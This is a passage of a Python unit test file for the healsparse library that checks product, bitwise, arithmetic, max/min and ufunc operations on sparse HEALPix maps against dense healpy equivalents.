maxval = 100
# Test multiplying two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = random.randint(low=1, high=maxval, size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map1.valid_pixels
hpmap1[vpix] = sparse_map1.get_values_pix(vpix)
sparse_map2 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel2 = np.arange(15000, 25000)
values2 = random.randint(low=1, high=maxval, size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map2.valid_pixels
hpmap2[vpix] = sparse_map2.get_values_pix(vpix)
sparse_map3 = healsparse.HealSparseMap.make_empty(
nside_coverage,
nside_map,
np.int64,
sentinel=sentinel,
)
pixel3 = np.arange(16000, 25000)
values3 = random.randint(low=1, high=maxval, size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = sparse_map3.valid_pixels
hpmap3[vpix] = sparse_map3.get_values_pix(vpix)
# _intersection product
# product of 2
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > sentinel) & (hpmap2 > sentinel))
hpmap_product_intersection = np.zeros_like(hpmap1)
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_intersection.valid_pixels
pmap[vpix] = product_map_intersection.get_values_pix(vpix)
testing.assert_equal(hpmap_product_intersection, pmap)
# product of 3
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > sentinel) & (hpmap2 > sentinel) & (hpmap3 > sentinel))
hpmap_product_intersection = np.zeros_like(hpmap1)
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd] * hpmap3[gd]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_intersection.valid_pixels
pmap[vpix] = product_map_intersection.get_values_pix(vpix)
testing.assert_equal(hpmap_product_intersection, pmap)
# _union product
# product of 2
product_map_union = healsparse.product_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > sentinel) | (hpmap2 > sentinel))
hpmap_product_union = np.zeros_like(hpmap1)
hpmap_product_union[gd] = 1
gd1, = np.where(hpmap1[gd] > sentinel)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > sentinel)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_union.valid_pixels
pmap[vpix] = product_map_union.get_values_pix(vpix)
testing.assert_equal(hpmap_product_union, pmap)
# product 3
product_map_union = healsparse.product_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > sentinel) | (hpmap2 > sentinel) | (hpmap3 > sentinel))
hpmap_product_union = np.zeros_like(hpmap1)
hpmap_product_union[gd] = 1
gd1, = np.where(hpmap1[gd] > sentinel)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > sentinel)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
gd3, = np.where(hpmap3[gd] > sentinel)
hpmap_product_union[gd[gd3]] *= hpmap3[gd[gd3]]
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = product_map_union.valid_pixels
pmap[vpix] = product_map_union.get_values_pix(vpix)
testing.assert_equal(hpmap_product_union, pmap)
# Test multiplying an int constant to a map
mult_map = sparse_map1 * 2
hpmap_product2 = np.zeros_like(hpmap1)
gd, = np.where(hpmap1 > sentinel)
hpmap_product2[gd] = hpmap1[gd] * 2
pmap = np.zeros(hp.nside2npix(nside_map), dtype=np.int64)
vpix = mult_map.valid_pixels
pmap[vpix] = mult_map.get_values_pix(vpix)
testing.assert_equal(hpmap_product2, pmap)
def test_or(self):
"""
Test map bitwise or.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2).astype(dtype)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2).astype(dtype)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2).astype(dtype)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection or
# or 2
or_map_intersection = healsparse.or_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_or_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_intersection[gd] = hpmap1[gd].astype(dtype) | hpmap2[gd].astype(dtype)
testing.assert_almost_equal(hpmap_or_intersection, or_map_intersection.generate_healpix_map())
# or 3
or_map_intersection = healsparse.or_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_or_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_intersection[gd] = (hpmap1[gd].astype(dtype) |
hpmap2[gd].astype(dtype) |
hpmap3[gd].astype(dtype))
testing.assert_almost_equal(hpmap_or_intersection, or_map_intersection.generate_healpix_map())
# Union or
# or 2
or_map_union = healsparse.or_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_or_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_union[gd] = (np.clip(hpmap1[gd], 0.0, None).astype(dtype) |
np.clip(hpmap2[gd], 0.0, None).astype(dtype))
testing.assert_almost_equal(hpmap_or_union, or_map_union.generate_healpix_map())
# or 3
or_map_union = healsparse.or_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_or_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_or_union[gd] = (np.clip(hpmap1[gd], 0.0, None).astype(dtype) |
np.clip(hpmap2[gd], 0.0, None).astype(dtype) |
np.clip(hpmap3[gd], 0.0, None).astype(dtype))
testing.assert_almost_equal(hpmap_or_union, or_map_union.generate_healpix_map())
# Test orring an int constant to a map
or_map = sparse_map1 | 2
hpmap_or2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_or2[gd] = hpmap1[gd].astype(dtype) | 2
testing.assert_almost_equal(hpmap_or2, or_map.generate_healpix_map())
# Test orring an int constant to a map, in place
sparse_map1 |= 2
testing.assert_almost_equal(hpmap_or2, sparse_map1.generate_healpix_map())
def test_and(self):
"""
Test map bitwise and.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2).astype(dtype)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2).astype(dtype)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, dtype)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2).astype(dtype)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection and
# and 2
and_map_intersection = healsparse.and_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_and_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_intersection[gd] = hpmap1[gd].astype(dtype) & hpmap2[gd].astype(dtype)
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_intersection == 0)
hpmap_and_intersection[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_intersection, and_map_intersection.generate_healpix_map())
# and 3
and_map_intersection = healsparse.and_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_and_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_intersection[gd] = (hpmap1[gd].astype(dtype) &
hpmap2[gd].astype(dtype) &
hpmap3[gd].astype(dtype))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_intersection == 0)
hpmap_and_intersection[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_intersection, and_map_intersection.generate_healpix_map())
# Union and
# and 2
and_map_union = healsparse.and_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_and_union = np.zeros_like(hpmap1) + hp.UNSEEN
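# Seed the union pixels with -1: in two's complement -1 has every bit set, so
# it is the identity for bitwise AND and each map's bits survive intact.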
hpmap_and_union[gd] = -1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd1]] = (hpmap_and_union[gd[gd1]].astype(np.int64) &
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd2]] = (hpmap_and_union[gd[gd2]].astype(np.int64) &
hpmap2[gd[gd2]].astype(np.int64))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_union == 0)
hpmap_and_union[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_union, and_map_union.generate_healpix_map())
# and 3
and_map_union = healsparse.and_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_and_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_and_union[gd] = -1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd1]] = (hpmap_and_union[gd[gd1]].astype(np.int64) &
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd2]] = (hpmap_and_union[gd[gd2]].astype(np.int64) &
hpmap2[gd[gd2]].astype(np.int64))
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_and_union[gd[gd3]] = (hpmap_and_union[gd[gd3]].astype(np.int64) &
hpmap3[gd[gd3]].astype(np.int64))
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and_union == 0)
hpmap_and_union[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and_union, and_map_union.generate_healpix_map())
# Test anding an int constant to a map
and_map = sparse_map1 & 2
hpmap_and2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_and2[gd] = hpmap1[gd].astype(dtype) & 2
if dtype == np.uint64:
# For uint, we cannot tell the difference between 0 and UNSEEN
bd, = np.where(hpmap_and2 == 0)
hpmap_and2[bd] = hp.UNSEEN
testing.assert_almost_equal(hpmap_and2, and_map.generate_healpix_map())
# Test anding an int constant to a map, in place
sparse_map1 &= 2
testing.assert_almost_equal(hpmap_and2, sparse_map1.generate_healpix_map())
def test_xor(self):
"""
Test map bitwise xor.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
for dtype in [np.int64, np.uint64]:
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection xor
# xor 2
xor_map_intersection = healsparse.xor_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_xor_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_intersection[gd] = hpmap1[gd].astype(np.int64) ^ hpmap2[gd].astype(np.int64)
testing.assert_almost_equal(hpmap_xor_intersection, xor_map_intersection.generate_healpix_map())
# xor 3
xor_map_intersection = healsparse.xor_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_xor_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_intersection[gd] = (hpmap1[gd].astype(np.int64) ^
hpmap2[gd].astype(np.int64) ^
hpmap3[gd].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_intersection, xor_map_intersection.generate_healpix_map())
# Union xor
# xor 2
xor_map_union = healsparse.xor_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_xor_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_union[gd] = 0.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd1]] = (hpmap_xor_union[gd[gd1]].astype(np.int64) ^
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd2]] = (hpmap_xor_union[gd[gd2]].astype(np.int64) ^
hpmap2[gd[gd2]].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_union, xor_map_union.generate_healpix_map())
# xor 3
xor_map_union = healsparse.xor_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_xor_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_union[gd] = 0.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd1]] = (hpmap_xor_union[gd[gd1]].astype(np.int64) ^
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd2]] = (hpmap_xor_union[gd[gd2]].astype(np.int64) ^
hpmap2[gd[gd2]].astype(np.int64))
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd3]] = (hpmap_xor_union[gd[gd3]].astype(np.int64) ^
hpmap3[gd[gd3]].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_union, xor_map_union.generate_healpix_map())
# Test xorring an int constant to a map
xor_map = sparse_map1 ^ 2
hpmap_xor2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_xor2[gd] = hpmap1[gd].astype(np.int64) ^ 2
testing.assert_almost_equal(hpmap_xor2, xor_map.generate_healpix_map())
# Test xorring an int constant to a map, in place
sparse_map1 ^= 2
testing.assert_almost_equal(hpmap_xor2, sparse_map1.generate_healpix_map())
def test_miscellaneous_operations(self):
"""
Test miscellaneous constant operations.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
# subtraction
test_map = sparse_map1 - 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] - 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map -= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
# division
test_map = sparse_map1 / 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] / 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map /= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
# power
test_map = sparse_map1 ** 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] ** 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map **= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
def test_max_intersection(self):
"""
Test map maximum of the intersection.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the maximum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Maximum of 2
max_map = healsparse.max_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
# Maximum of 3
max_map = healsparse.max_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
hpmap_max[gd] = np.fmax(hpmap_max[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
def test_min_intersection(self):
"""
Test map minimum of the intersection.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Minimum of 2
min_map = healsparse.min_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
# Minimum of 3 intersection
min_map = healsparse.min_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
hpmap_min[gd] = np.fmin(hpmap_min[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
def test_max_union(self):
"""
Test map maximum of the union.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the maximum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Maximum of 2 map union
max_map = healsparse.max_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
# Maximum of 3 map union
max_map = healsparse.max_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
hpmap_max[gd] = np.fmax(hpmap_max[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
def test_min_union(self):
"""
Test map minimum of the union.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Minimum of the union 2
min_map = healsparse.min_union([sparse_map1, sparse_map2])
# This is tricky because hp.UNSEEN is a float sentinel
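# Flipping unseen pixels to -hp.UNSEEN (a huge positive value) means np.fmin
# always prefers a real map value wherever at least one input map is seen.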
hpmap1[hpmap1 == hp.UNSEEN] = -hp.UNSEEN
hpmap2[hpmap2 == hp.UNSEEN] = -hp.UNSEEN
gd, = np.where((hpmap1 < -hp.UNSEEN) | (hpmap2 < -hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])  # with unseen flipped, this yields the union minimum
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
# Minimum of 3
min_map = healsparse.min_union([sparse_map1, sparse_map2, sparse_map3])
hpmap1[hpmap1 == hp.UNSEEN] = -hp.UNSEEN
hpmap2[hpmap2 == hp.UNSEEN] = -hp.UNSEEN
hpmap3[hpmap3 == hp.UNSEEN] = -hp.UNSEEN
gd, = np.where((hpmap1 < -hp.UNSEEN) | (hpmap2 < -hp.UNSEEN) | (hpmap3 < -hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
hpmap_min[gd] = np.fmin(hpmap_min[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
def test_ufunc_intersection(self):
"""
Test numpy's ufunc on the intersection of HealSparseMaps
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Test an example ufunc (np.add) with 2 maps
add_map = healsparse.ufunc_intersection([sparse_map1, sparse_map2], np.add)
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_add = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_add[gd] = np.add(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
# Test an example ufunc (np.add) with 3 maps
add_map = healsparse.ufunc_intersection([sparse_map1, sparse_map2, sparse_map3], np.add)
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_add = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_add[gd] = np.add(hpmap1[gd], hpmap2[gd])
hpmap_add[gd] = np.add(hpmap_add[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
def test_ufunc_union(self):
"""
Test numpy's ufunc on the union of HealSparseMaps
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Test an example ufunc (np.add) with 2 maps
add_map = healsparse.ufunc_union([sparse_map1, sparse_map2], np.add)
# This is tricky again because hp.UNSEEN is a float
mask = (hpmap1 == hp.UNSEEN) & (hpmap2 == hp.UNSEEN)
hpmap1[hpmap1 == hp.UNSEEN] = 0
hpmap2[hpmap2 == hp.UNSEEN] = 0
